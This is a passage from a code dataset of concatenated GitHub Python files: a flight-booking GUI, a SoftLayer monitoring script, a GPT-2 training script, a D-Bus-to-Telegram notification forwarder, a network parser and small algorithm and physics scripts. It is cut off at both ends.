Y)\n\n\ndef test2():\n map = Map(TEST_DEPTH, TEST_X, TEST_Y)\n start = Node(0, 0, 0, TORCH, 0)\n goal = (TEST_X, TEST_Y)\n search = UniformCostSearch(start, goal, map)\n\n\ndef main():\n test1()\n\n p = part1()\n print(p)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2018/python/day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27063531722","text":"import tkinter as tk\nfrom tkcalendar import DateEntry\nfrom tkinter import ttk, Label, Spinbox, messagebox\nfrom PIL import Image, ImageTk\n\nimport pymysql\nimport config\nimport FlightBooking\n\nclass BookingApp:\n def __init__(self, root):\n self.root = root\n self.root.geometry(f\"{root.winfo_screenwidth()}x{root.winfo_screenheight()}\")\n self.root.title(\"Sky Travellers: Flight Research\")\n\n self.header_height = root.winfo_screenheight() * 0.20\n self.window_width = root.winfo_screenwidth()\n self.window_height = root.winfo_screenheight()\n self.image2 = None\n self.image = None\n\n self.departure_var = tk.StringVar()\n self.arrival_var = tk.StringVar()\n self.num_tickets_var = tk.StringVar()\n\n self.create_window()\n\n def redirect_to_home_page(self, event):\n self.root.destroy()\n\n def create_window(self):\n conn = pymysql.connect(\n host='localhost',\n user='root',\n password='root',\n db='AirlineDatabase',\n port=8889\n )\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n\n cursor.execute(\"SELECT DISTINCT Departure_Airport FROM Flight\")\n departure_airports = [airport['Departure_Airport'] for airport in cursor.fetchall()]\n\n cursor.execute(\"SELECT DISTINCT Arrival_Airport FROM Flight\")\n arrival_airports = [airport['Arrival_Airport'] for airport in cursor.fetchall()]\n\n #background picture\n self.background_image = Image.open(\"../Pictures/bg4.png\")\n self.background_photo = ImageTk.PhotoImage(self.background_image.resize((self.window_width, self.window_height), Image.LANCZOS))\n background_label = tk.Label(self.root, image=self.background_photo)\n background_label.place(relwidth=1, relheight=1)\n self.main_frame = tk.Frame(self.root, relief=\"solid\", borderwidth=2)\n self.main_frame.grid(row=1, column=0, padx=15, pady=15)\n\n # logo picture\n image_path2 = \"../Pictures/Logo.png\"\n self.image2 = tk.PhotoImage(file=image_path2)\n self.image2 = self.image2.subsample(5)\n image_label2 = tk.Label(self.root, image=self.image2)\n image_label2.place(x=self.header_height * 0.7, y=self.header_height * 0.1)\n\n # Return to home page\n image_label2.bind(\"\", self.redirect_to_home_page)\n\n title_label = tk.Label(self.main_frame, text=\"Flight Research\", font=(\"Helvetica\", 16))\n title_label.grid(row=0, column=0, columnspan=2, pady=10)\n\n date_label = tk.Label(self.main_frame, text=\"Departure Date\")\n date_label.grid(row=1, column=0, pady=5)\n self.date_var = tk.StringVar()\n date_entry = DateEntry(self.main_frame, textvariable=self.date_var, date_pattern=\"dd/mm/yyyy\")\n date_entry.grid(row=1, column=1, pady=5)\n\n departure_label = tk.Label(self.main_frame, text=\"Departure airport\")\n departure_label.grid(row=2, column=0, pady=5)\n self.departure_var = tk.StringVar()\n departure_combobox = ttk.Combobox(self.main_frame, textvariable=self.departure_var)\n departure_combobox['values'] = departure_airports\n departure_combobox.bind('<>', self.check_airport_selection)\n departure_combobox.grid(row=2, column=1, pady=5)\n\n arrival_label = tk.Label(self.main_frame, text=\"Arrival airport\")\n arrival_label.grid(row=3, column=0, pady=5)\n self.arrival_var = tk.StringVar()\n arrival_combobox = ttk.Combobox(self.main_frame, textvariable=self.arrival_var)\n arrival_combobox['values'] = arrival_airports\n arrival_combobox.bind('<>', self.check_airport_selection)\n arrival_combobox.grid(row=3, column=1, pady=5)\n\n self.num_tickets_label = tk.Label(self.main_frame, text=\"Number of Tickets\")\n self.num_tickets_label.grid(row=5, column=0, pady=5)\n self.num_tickets_spinbox = Spinbox(self.main_frame, from_=1, to=4, textvariable=self.num_tickets_var)\n self.num_tickets_spinbox.grid(row=5, column=1, pady=5)\n\n self.error_label = tk.Label(self.main_frame, text=\"\", fg=\"red\")\n self.error_label.grid(row=4, column=0, columnspan=2, pady=5)\n\n self.search_button = tk.Button(self.main_frame, text=\"Flight Research\", command=self.redirect_to_Flight_booking)\n self.search_button.grid(row=6, column=0, columnspan=2, pady=10)\n\n image_path = \"../Pictures/avionResa.png\"\n self.image = tk.PhotoImage(file=image_path)\n self.image = self.image.subsample(2)\n image_label = Label(self.main_frame, image=self.image)\n image_label.grid(row=0, column=2, rowspan=7, padx=10)\n\n self.root.columnconfigure(0, weight=1)\n self.root.rowconfigure(1, weight=1)\n\n cursor.close()\n conn.close()\n\n def check_airport_selection(self, event):\n if self.departure_var.get() == self.arrival_var.get():\n self.error_label.config(text=\"You can't have the same Departure Airport and Arrival Airport\")\n self.search_button['state'] = 'disabled'\n else:\n self.error_label.config(text=\"\")\n self.search_button['state'] = 'normal'\n\n def search_flights(self):\n date = self.date_var.get()\n departure = self.departure_var.get()\n arrival = self.arrival_var.get()\n person_type = self.person_type_var.get()\n print(f\"Date: {date}, Departure: {departure}, Arrival: {arrival}, Type of Person: {person_type}\")\n\n def redirect_to_Flight_booking(self):\n try:\n config.departure_date = self.date_var.get()\n config.departure_airport = self.departure_var.get()\n config.arrival_airport = self.arrival_var.get()\n config.num_tickets = int(self.num_tickets_var.get())\n\n self.flightBooking_window = tk.Toplevel(self.root)\n self.app = FlightBooking.FlightSelectionPage(self.flightBooking_window, config.departure_date, config.departure_airport, config.arrival_airport, config.num_tickets)\n except Exception as e:\n messagebox.showerror(\"Error\", f\"Error on redirection {e}\")\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = BookingApp(root)\n root.mainloop()\n","repo_name":"Pierre-LouisTHOMAS/Python_Project","sub_path":"Front/PlaneBooking.py","file_name":"PlaneBooking.py","file_ext":"py","file_size_in_byte":6267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73866515985","text":"\"\"\"\nAdd subscribers\n\nThe scripts adds subscribers to an arbitrary VSI machine.\nfor more information see below:\n\nImportant manual pages:\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest/getMonitoringAgents\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent/getEligibleAlarmSubscibers\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent/setActiveAlarmSubscriber\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent/SoftLayer_User_Customer\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent/SoftLayer_User_Customer/getObject\nhttp://sldn.softlayer.com/reference/datatypes/SoftLayer_Monitoring_Agent/SoftLayer_User_Customer\n\nLicense: http://sldn.softlayer.com/article/License\nAuthor: SoftLayer Technologies, Inc. \n\"\"\"\nimport SoftLayer\n# Client configuration\nUSERNAME = 'set me'\nAPI_KEY = 'set me'\n\nhostnames = [\"rctest\", \"rctest2\"]\nmailsToAdd = [\"Nelson.Cabero@jalasoft.com\", \"miguel.higorre@jalasoft.com\"]\n\nclient = SoftLayer.Client(username=USERNAME, api_key=API_KEY)\n\n\ntry:\n # Getting all virtual servers on the account\n vServers = client['Account'].getVirtualGuests()\n for hostname in hostnames:\n for vServer in vServers:\n if hostname == vServer['hostname']:\n vSertverId = vServer['id']\n # Getting all the agents in the virtual machine\n agents = client['Virtual_Guest'].getMonitoringAgents(id=vSertverId)\n for agent in agents:\n agentId = agent['id']\n agentName = agent['name']\n elegibleSubscribers = client['SoftLayer_Monitoring_Agent'].getEligibleAlarmSubscibers(id=agentId)\n for mailToAdd in mailsToAdd:\n for elegibleSubscriber in elegibleSubscribers:\n if 'id' in elegibleSubscriber:\n suscriberId = elegibleSubscriber['id']\n userData = client['SoftLayer_User_Customer'].getObject(id=suscriberId)\n if mailToAdd.strip() == userData['email'].strip():\n added = client['SoftLayer_Monitoring_Agent'].setActiveAlarmSubscriber(suscriberId, id=agentId)\n if added:\n print(\"For hostname: \" + hostname + \" with ID \" + str(vSertverId) + \" in the agent for \" + agentName + \" the mail \" + mailToAdd + \" has been added.\")\n else:\n print(\"ERROR - For hostname: \" + hostname + \" with ID \" + str(vSertverId) + \" in the agent for \" + agentName + \" the mail \" + mailToAdd + \" has not been added.\")\n\nexcept SoftLayer.SoftLayerAPIError as e:\n print(\"Unable to add subscribers faultCode=%s, faultString=%s\" % (e.faultCode, e.faultString))\n exit(1)","repo_name":"kanja01/sl_script","sub_path":"add_subscribers.py","file_name":"add_subscribers.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35557314181","text":"# 처리되지 않은 데이터 중 가장 작은 데이터를 선택해 맨 앞에 있는 데이터와 바꾸는 것을 반복\n\narr = [7, 5, 9, 0, 3, 1, 6, 2, 4, 8]\nfor i, n in enumerate(arr):\n min_num = n\n min_index = i\n for j in range(i + 1, len(arr)):\n if min_num > arr[j]:\n min_num = arr[j]\n min_index = j\n arr[i] = min_num\n arr[min_index] = n\n\nprint(arr)\n","repo_name":"ParkSuah/algorithm_practice","sub_path":"Sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39609780414","text":"'''show_segment_routing_srv6_locator.py\n\nParser for the following show commands:\n * show segment-routing srv6 locator\n'''\n\n__author__ = 'takamitsu-iida'\n__date__ = 'Dec 20 2022'\n__version__ = 1.0\n\n# import re\n\n# metaparser\nfrom genie.metaparser import MetaParser\nfrom genie.metaparser.util.schemaengine import Any\n# from genie.metaparser.util.schemaengine import Schema\n# from genie.metaparser.util.schemaengine import Or\n# from genie.metaparser.util.schemaengine import Optional\n# from genie.metaparser.util.schemaengine import Use\n\n# https://pubhub.devnetcloud.com/media/genie-docs/docs/parsergen/apidoc/parsergen.html#\nfrom genie import parsergen\n\n# =============================================\n# Schema\n# =============================================\nclass ShowSegmentRoutingSrv6LocatorSchema(MetaParser):\n \"\"\"Schema for show segment-routing srv6 locator\"\"\"\n schema = {\n 'locator': {\n Any(): {\n 'prefix': str,\n 'status': str,\n }\n },\n }\n\n# =============================================\n# Parser\n# =============================================\nclass ShowSegmentRoutingSrv6Locator(ShowSegmentRoutingSrv6LocatorSchema):\n \"\"\"Parser for show segment-routing srv6 locator\n \"\"\"\n\n cli_command = 'show segment-routing srv6 locator'\n\n def cli(self, output=None):\n if output is None:\n output = self.device.execute(self.cli_command)\n if not output:\n return None\n\n parsed_dict = {}\n\n # Name Prefix Status\n # -------------------- ------------------------ ------\n header = ['Name', 'Prefix', 'Status']\n\n # dict key\n label = ['Name', 'prefix', 'status']\n\n result = parsergen.oper_fill_tabular(device_output=output, device_os='generic', header_fields=header, label_fields=label, index=[0])\n\n #from pprint import pprint\n #pprint(result.entries)\n\n if result.entries:\n for name, locator_dict in result.entries.items():\n del locator_dict['Name']\n parsed_dict.setdefault('locator', {}).update({name: locator_dict})\n\n #from pprint import pprint\n #pprint(parsed_dict)\n\n return parsed_dict\n","repo_name":"takamitsu-iida/pyats-fitelnet","sub_path":"genieparser/external_parser/fitelnet/show_segment_routing_srv6_locator.py","file_name":"show_segment_routing_srv6_locator.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73524349586","text":"import os, time, gc, json, pickle, argparse, math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nimport numpy as np\nfrom pytorch_pretrained_bert import GPT2Tokenizer, GPT2LMHeadModel, GPT2Config\nfrom tensorboardX import SummaryWriter\nfrom data.util import *\nfrom util import *\n\nce_loss_fn = nn.CrossEntropyLoss(reduction='none')\nmse_loss_fn = torch.nn.MSELoss(reduction='none')\n\ndef compute_loss(device, model, input_tokens, target_tokens, mask):\n input_tokens = input_tokens.to(device)\n target_tokens = target_tokens.to(device)\n\n logits, _ = model(input_tokens)\n num_logits = logits.size(-1)\n\n # Perform masking\n if mask is not None:\n mask = mask.to(device)\n logits = logits.masked_select(mask.unsqueeze(-1))\n target_tokens = target_tokens.masked_select(mask)\n\n ce_loss = ce_loss_fn(logits.view(-1, num_logits), target_tokens.view(-1)).float().mean()\n loss = ce_loss\n\n return loss, ce_loss\n\ndef compute_ranking_lp(device, model, tokens, mask, random_shift=False):\n \"\"\"\n Computes the average likelihood score over each class.\n Args:\n tokens: LongTensor of shape [Batch, Classes, Seq Len]\n mask: ByteTensor of shape [Batch, Classes, Seq Len]\n Returns:\n Tensor of [Batch, Classes]\n \"\"\"\n num_classes = tokens.size(1)\n tokens = tokens.to(device)\n input_tokens = tokens[:, :, :-1]\n target_tokens = tokens[:, :, 1:]\n\n # Remove classes dimension\n input_tokens = input_tokens.view(-1, input_tokens.size(-1))\n\n # Randomize the positional encoding\n position_ids = None\n if random_shift:\n position_ids = torch.arange(0, input_tokens.size(-1), dtype=torch.long, device=input_tokens.device)\n position_ids = position_ids.unsqueeze(0).expand_as(input_tokens)\n \n # position IDs should be expanded from [seq_len] to [batch, seq_len]\n # TODO: hardcoded length\n rand_shift = torch.randint(low=0, high=1024 - input_tokens.size(-1), size=(position_ids.size(0) // num_classes, 1)).to(device)\n # Each class should have the same random shift for fair comparison.\n rand_shift = rand_shift.repeat(1, num_classes).view(-1, 1)\n position_ids = position_ids + rand_shift\n\n logits, _ = model(input_tokens, position_ids=position_ids)\n logits = logits.view(-1, num_classes, logits.size(-2), logits.size(-1))\n\n # Pick the target log probs\n lprobs = torch.log_softmax(logits, dim=-1)\n lprobs = lprobs.gather(-1, target_tokens.unsqueeze(-1)).squeeze(-1).float()\n \n if mask is not None:\n # Cast mask\n mask = mask[:, :, :-1].to(lprobs)\n # Only select masked tokens\n lprobs *= mask\n # Take average log prob across the sequence s.t we have scores for [Batch, 4]\n lprobs = lprobs.float().sum(dim=-1) / mask.sum(dim=-1)\n else:\n lprobs = lprobs.float().mean(dim=-1)\n return lprobs\n\ndef train_step(args, device, model, optimizer, input_tokens, target_tokens, mask):\n model.train()\n\n loss, ce_loss = compute_loss(device, model, input_tokens, target_tokens, mask)\n optimizer.backward(loss)\n\n return loss.item(), ce_loss.item()\n\ndef train_ranking_step(args, device, model, optimizer, tokens, mask):\n model.train()\n\n lprobs = compute_ranking_lp(device, model, tokens, mask)\n assert len(lprobs.size()) == 2\n # First item is the right answer. We want to maximize that.\n lprob_correct = torch.log_softmax(lprobs, dim=-1)[:, 0]\n loss = -lprob_correct.mean()\n optimizer.backward(loss)\n\n return loss.item()\n\ndef main_worker(gpu, ngpus_per_node, args):\n args.gpu = gpu\n\n if args.gpu is not None:\n print(\"Use GPU: {} for training\".format(args.gpu))\n \n # For multiprocessing distributed training, rank needs to be the\n # global rank among all the processes\n args.rank = args.rank * ngpus_per_node + gpu\n print('Setting rank', args.rank)\n \n recon_attempt = 1\n connected = False\n\n if args.rank != 0:\n # Stall to have rank 0 node go first\n time.sleep(3)\n\n while not connected:\n try:\n dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n connected = True\n print('Established connection. Rank:', args.rank)\n except Exception as e:\n # Sometimes the head node launches after the worker, which would cause an issue\n print('Failed to init process group. Retrying...', recon_attempt, e)\n recon_attempt += 1\n time.sleep(10)\n\n # For multiprocessing distributed, DistributedDataParallel constructor\n # should always set the single device scope, otherwise,\n # DistributedDataParallel will use all available devices.\n device = torch.device('cuda', args.gpu)\n torch.cuda.set_device(device)\n\n print('Loading models...')\n cache_dir = os.path.join(args.out_dir, 'cache')\n os.makedirs(cache_dir, exist_ok=True)\n\n if args.rank == 0:\n save_folder = os.path.join(args.out_dir, args.experiment)\n\n try:\n os.makedirs(save_folder)\n except FileExistsError as e:\n print('Experiment name already exists!', args.experiment)\n raise e\n\n t_writer = SummaryWriter(os.path.join(save_folder, 'train'), flush_secs=5)\n v_writer = SummaryWriter(os.path.join(save_folder, 'val'), flush_secs=5)\n\n # Load pre-trained teacher tokenizer (vocabulary)\n tokenizer = GPT2Tokenizer.from_pretrained('gpt2', cache_dir=cache_dir)\n # Hack to allow tokenizing longer sequences.\n tokenizer.max_len = int(1e12)\n\n model = GPT2LMHeadModel.from_pretrained('gpt2', cache_dir=cache_dir)\n\n if args.load:\n if args.load == 'none':\n print('Randomly initializing model weights...')\n model.apply(model.init_weights)\n else:\n print('Loading model weights...')\n model.load_state_dict(torch.load(os.path.join(args.load, 'model_latest.pt'), map_location='cpu'))\n gc.collect()\n\n if args.rank == 0 and args.model_type:\n # Write config to file\n with open(os.path.join(save_folder, 'config.pkl'), 'wb') as f:\n pickle.dump(config, f)\n\n print('params:', num_params(model))\n print('Done.')\n\n print('Setup data...')\n # Batch and sequence length schedule\n assert len(args.batch_sizes) == len(args.seq_lens)\n batch_schedule = list(zip(map(int, args.batch_sizes), map(int, args.seq_lens)))\n assert len(batch_schedule) == 2, 'Currently not supporting multiple schedule'\n cur_b_schedule = len(batch_schedule) - 1 if args.switch_time == 0 else 0\n\n print('Batch schedule', batch_schedule)\n train_loader, val_loader = prepare_dataset(\n args.data_dir, args.dataset, tokenizer,\n batch_schedule[cur_b_schedule][0], batch_schedule[cur_b_schedule][1],\n batch_schedule[-1][0], batch_schedule[-1][1],\n num_workers=args.workers\n )\n print('Done.')\n\n if args.swag > 0:\n swag_train_loader, swag_val_loader = prepare_dataset(\n args.data_dir,\n 'swag',\n tokenizer,\n 16, 64,\n 16, 64,\n num_workers=1\n )\n print('SWAG Loaded.')\n if args.synth > 0:\n gpt2_train_loader, _ = prepare_dataset(\n args.data_dir,\n 'synth',\n tokenizer,\n 16, 128,\n 16, 128,\n num_workers=1\n )\n print('Loaded GPT2 samples')\n\n if args.fp16:\n model = model.half()\n model = model.to(device)\n\n print('Wrapping models and optimizers...')\n # Apply linear scaling rule to increase batch size for short sequence training.\n lr_schedule = switch_schedule(linear_schedule(args), batch_schedule[cur_b_schedule][0] / batch_schedule[-1][0], int(args.iterations * args.switch_time))\n loss_model, optimizer, scheduler = create_optimizers(model, args, lr_schedule)\n print('Done.')\n\n # TODO: Somehow restoring the optimizer leads to CUDA illegal memory error.\n # if args.load:\n # print('Loading optimizer weights...')\n # optimizer.load_state_dict(torch.load(os.path.join(args.load, 'opt_latest.pt'), map_location='cpu'))\n # gc.collect()\n\n print('Begin training iterations')\n save_interval = 1000\n max_val_batches = 1000\n num_iters = 0\n e = 0\n optimizer.zero_grad()\n\n if args.swag > 0:\n swag_iter = iter(swag_train_loader)\n if args.synth > 0:\n gpt2samples_iter = iter(gpt2_train_loader)\n\n def val_step(val_loader):\n with torch.no_grad():\n print('Validation loop. Batches:', len(val_loader))\n stats = []\n # Validation\n for i, (input_tokens, target_tokens, mask) in enumerate(val_loader):\n loss, ce_loss = compute_loss(device, loss_model, input_tokens, target_tokens, mask)\n stats.append([loss.item(), math.exp(ce_loss.item())])\n\n if i > max_val_batches:\n break\n \n stats = np.mean(stats, axis=0)\n v_writer.add_scalar('loss', stats[0], num_iters)\n v_writer.add_scalar('ppl', stats[1], num_iters)\n\n if args.swag > 0:\n # Process swag\n correct = 0\n total = 0\n for i, (tokens, mask) in enumerate(swag_val_loader):\n lprobs = compute_ranking_lp(device, model, tokens, mask)\n chosen = lprobs.argmax(dim=-1)\n\n correct += (chosen == 0).sum().item()\n total += int(chosen.size(0))\n \n if i > max_val_batches:\n break\n v_writer.add_scalar('acc/swag', correct / total, num_iters)\n \n # TODO: Ideally all nodes should run validation.\n if args.rank == 0:\n val_step(val_loader)\n\n while num_iters < args.iterations:\n # Run epoch\n st = time.time()\n\n # Training\n print('Training loop. Batches:', len(train_loader))\n for i, (input_tokens, target_tokens, mask) in enumerate(train_loader):\n # Normal grad step\n optimizer.zero_grad()\n loss, ce_loss = train_step(args, device, loss_model, optimizer, input_tokens, target_tokens, mask)\n optimizer.step()\n\n if args.synth > 0 and i % args.synth == 0:\n # PF grad step\n optimizer.zero_grad()\n\n try:\n real_fake_pair = next(gpt2samples_iter)\n except StopIteration:\n gpt2samples_iter = iter(gpt2_train_loader)\n real_fake_pair = next(gpt2samples_iter)\n\n synth_loss = train_ranking_step(args, device, loss_model, optimizer, real_fake_pair, None)\n optimizer.step()\n\n if args.swag > 0 and i % args.swag == 0:\n optimizer.zero_grad()\n try:\n swag_loss = train_ranking_step(args, device, loss_model, optimizer, *next(swag_iter))\n except StopIteration:\n print('Finished one epoch of swag training.')\n swag_iter = iter(swag_train_loader)\n swag_loss = train_ranking_step(args, device, loss_model, optimizer, *next(swag_iter))\n optimizer.step()\n\n if args.rank == 0:\n lr = scheduler.get_lr()[0] if args.warmup != -1 else optimizer.param_groups[0]['lr']\n # Log to Tensorboard\n t_writer.add_scalar('loss', loss, num_iters)\n\n if args.synth > 0 and i % args.synth == 0:\n t_writer.add_scalar('loss/synth', synth_loss, num_iters)\n\n if args.swag > 0 and i % args.swag == 0:\n t_writer.add_scalar('loss/swag', swag_loss, num_iters)\n\n t_writer.add_scalar('ppl', math.exp(ce_loss), num_iters)\n t_writer.add_scalar('lr', lr, num_iters)\n t_writer.add_scalar('iter_time', time.time() - st, num_iters)\n\n st = time.time()\n end = num_iters >= args.iterations\n\n if args.warmup != -1:\n scheduler.step()\n\n if args.rank == 0 and num_iters % save_interval == 0 and num_iters > 0:\n print('Saving model...')\n torch.save(model.state_dict(), os.path.join(save_folder, 'model_{:05d}.pt'.format(num_iters // save_interval)))\n torch.save(model.state_dict(), os.path.join(save_folder, 'model_latest.pt'))\n torch.save(optimizer.state_dict(), os.path.join(save_folder, 'opt_latest.pt'))\n torch.save(scheduler.state_dict(), os.path.join(save_folder, 'scheduler_latest.pt'))\n\n if end:\n break\n num_iters += 1\n \n if num_iters == int(args.iterations * args.switch_time) and args.switch_time > 0:\n print('Switch to long sequence training')\n cur_b_schedule += 1\n train_loader, val_loader = prepare_dataset(\n args.dataset_dir, args.dataset_name, tokenizer,\n batch_schedule[cur_b_schedule][0], batch_schedule[cur_b_schedule][1],\n batch_schedule[-1][0], batch_schedule[-1][1]\n )\n\n if args.rank == 0:\n val_step(val_loader)\n\n print('Saving model...')\n torch.save(model.state_dict(), os.path.join(save_folder, 'model_val_{:05d}.pt'.format(num_iters // save_interval)))\n torch.save(model.state_dict(), os.path.join(save_folder, 'model_latest.pt'))\n torch.save(optimizer.state_dict(), os.path.join(save_folder, 'opt_latest.pt'))\n torch.save(scheduler.state_dict(), os.path.join(save_folder, 'scheduler_latest.pt'))\n e += 1\n\n print('Training complete.')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('experiment', type=str)\n # Default parameters are set based on single GPU training\n parser.add_argument('--lr', type=float, default=5e-5)\n parser.add_argument('--iterations', type=int, default=10000)\n parser.add_argument('--batch-sizes', nargs='+', type=int, default=[4, 2], help='batch size per GPU. Lists the schedule.')\n parser.add_argument('--seq-lens', nargs='+', type=int, default=[512, 1024], help='seq length per sample. Lists the schedule.')\n parser.add_argument('--warmup', type=int, default=1000, help=\"Amount of iterations to warmup, then decay. (-1 for no warmup and decay)\")\n parser.add_argument('--switch-time', type=float, default=0, help=\"Percentage of iterations to spend on short sequence training.\")\n parser.add_argument('--fp16', action='store_true', help=\"Train using FP16?\")\n parser.add_argument('--model-type', type=str, default=None, help=\"Type of model to use\")\n parser.add_argument('--dataset', type=str, default='wp', help=\"Dataset to use for training\")\n parser.add_argument('--swag', default=0, type=int, help=\"Use SWAG dataset as auxiliary task?\")\n parser.add_argument('--synth', default=0, type=int, help=\"Use synthetic examples as auxiliary task?\")\n\n parser.add_argument('--data-dir', type=str, default='../data')\n parser.add_argument('--out-dir', type=str, default='out')\n parser.add_argument('--load', type=str, help='path to load model from')\n parser.add_argument('--world-size', default=1, type=int,\n help='number of nodes for distributed training')\n parser.add_argument('--rank', default=0, type=int,\n help='node rank for distributed training')\n parser.add_argument('--dist-url', default='tcp://127.0.0.1:9999', type=str,\n help='url used to set up distributed training')\n parser.add_argument('--dist-backend', default='nccl', type=str,\n help='distributed backend') \n parser.add_argument('--workers', default=2, type=int, metavar='N',\n help='number of data loading workers')\n args = parser.parse_args()\n print(args)\n print('Starting experiment:', args.experiment)\n # Each node is expected to have same number of GPUs\n ngpus_per_node = torch.cuda.device_count()\n # Since we have ngpus_per_node processes per node, the total world_size\n # needs to be adjusted accordingly\n args.world_size = ngpus_per_node * args.world_size\n # Use torch.multiprocessing.spawn to launch distributed processes: the\n # main_worker process function\n mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))","repo_name":"calclavia/story-generation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16791,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"48"} +{"seq_id":"15680202150","text":"import signal\nimport sys\nimport urllib.parse\n \nimport dbus\nimport requests\nfrom dbus.mainloop.glib import DBusGMainLoop\nfrom gi.repository import GLib\n \n# Telegram bot: https://medium.com/codex/using-python-to-send-telegram-messages-in-3-simple-steps-419a8b5e5e2\nfrom config import TEL_TOKEN, CHAT_ID\n \nblacklist = []\n \n# Catch keyboard interrupt event and give a prettier output.\ndef sigint_handler(signal, frame):\n print(\"\\nKeyboardInterrupt caught, exiting Rocketgram.\")\n sys.exit(0)\n \n \nsignal.signal(signal.SIGINT, sigint_handler)\n \n \nclass Notifier:\n def __init__(self):\n self.notifications_history = set()\n self.TOKEN = TEL_TOKEN\n self.chat_id = CHAT_ID\n \n def print_notification(self, bus, message):\n keys = [\n \"app_name\",\n \"replaces_id\",\n \"app_icon\",\n \"summary\",\n \"body\",\n \"actions\",\n \"hints\",\n \"expire_timeout\",\n ]\n args = message.get_args_list()\n \n if len(args) == 8:\n notification = dict([(keys[i], args[i]) for i in range(8)])\n \n body = str(notification[\"body\"])\n summary = str(notification[\"summary\"])\n rocket_chat = \"rocketchat.*.*\"\n app_name = str(notification[\"app_name\"])\n \n if app_name not in blacklist:\n cleaned_body = body.replace(rocket_chat, \"\").strip()\n notification_tuple = (summary, cleaned_body)\n msg = urllib.parse.quote_plus(f\"{summary}: {cleaned_body}\")\n \n if notification_tuple not in self.notifications_history:\n self.notifications_history.add(notification_tuple)\n try:\n requests.get(\n f\"https://api.telegram.org/bot{self.TOKEN}/sendMessage?chat_id={self.chat_id}&text={msg}\"\n )\n except Exception as e:\n print(e.message, e.args)\n print(f\"{app_name} notification sended to telegram.\")\n \n \nnotifier = Notifier()\nloop = DBusGMainLoop(set_as_default=True)\nsession_bus = dbus.SessionBus()\nsession_bus.add_match_string(\n \"type='method_call',interface='org.freedesktop.Notifications',member='Notify',eavesdrop=true\"\n)\nsession_bus.add_message_filter(notifier.print_notification)\n \nprint(\"Rocketgram is running.\")\n \nGLib.MainLoop().run()\n","repo_name":"valteriomon/code-snippets","sub_path":"rocketgram.py","file_name":"rocketgram.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1602181385","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nProject quantities.\n\n@author: paola\n\n\"\"\"\nimport sys\nsys.path.append('/Users/paolamartire/tde_comparison')\n\nfrom src.Utilities.isalice import isalice\nalice, plot = isalice()\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numba\nfrom src.Luminosity.select_path import select_snap\nfrom src.Calculators.THREE_tree_caster import grid_maker\n\n# Constants & Converter\nRsol_to_cm = 6.957e10 # [cm]\n\n@numba.njit\ndef projector(gridded_den, gridded_mass, x_radii, y_radii, z_radii):\n \"\"\" Project density on XY plane. NB: to plot you have to transpose the saved data\"\"\"\n # Make the 3D grid \n flat_den = np.zeros(( len(x_radii), len(y_radii) ))\n # flat_mass = np.zeros(( len(x_radii), len(y_radii) ))\n for i in range(len(x_radii)):\n for j in range(len(y_radii)):\n mass_zsum = 0\n for k in range(len(z_radii) - 1): # NOTE SKIPPING LAST Z PLANE\n dz = (z_radii[k+1] - z_radii[k]) * Rsol_to_cm\n # mass_zsum += gridded_mass[i,j,k]\n flat_den[i,j] += gridded_den[i,j,k] * dz #* gridded_mass[i,j,k]\n #flat_den[i,j] = np.divide(flat_den[i,j], mass_zsum)\n return flat_den\n \nif __name__ == '__main__':\n m = 4\n save = True \n check = 'fid' \n snapshots, days = select_snap(m, check)\n\n for snap in snapshots:\n _, gridded_den, gridded_mass, x_radii, y_radii, z_radii = grid_maker(snap, m, check,\n 800, 800)\n flat_den = projector(gridded_den, gridded_mass, x_radii, y_radii, z_radii)\n\n if save:\n if alice:\n pre = '/home/s3745597/data1/TDE/'\n sim = f'{m}-{check}'\n np.savetxt(f'{pre}tde_comparison/data/denproj/denproj{sim}{snap}.txt', flat_den)\n np.savetxt(f'{pre}tde_comparison/data/denproj/xarray{sim}.txt', x_radii)\n np.savetxt(f'{pre}tde_comparison/data/denproj/yarray{sim}.txt', y_radii)\n else:\n np.savetxt(f'data/localdenproj{m})_{snap}.txt', flat_den) \n np.savetxt(f'data/localxarray{m}.txt', x_radii) \n np.savetxt(f'data/localyarray{m}.txt', y_radii) \n\n#%% Plot\n if plot:\n import colorcet\n fig, ax = plt.subplots(1,1)\n plt.rcParams['text.usetex'] = True\n plt.rcParams['figure.dpi'] = 300\n plt.rcParams['font.family'] = 'Times New Roman'\n plt.rcParams['figure.figsize'] = [6, 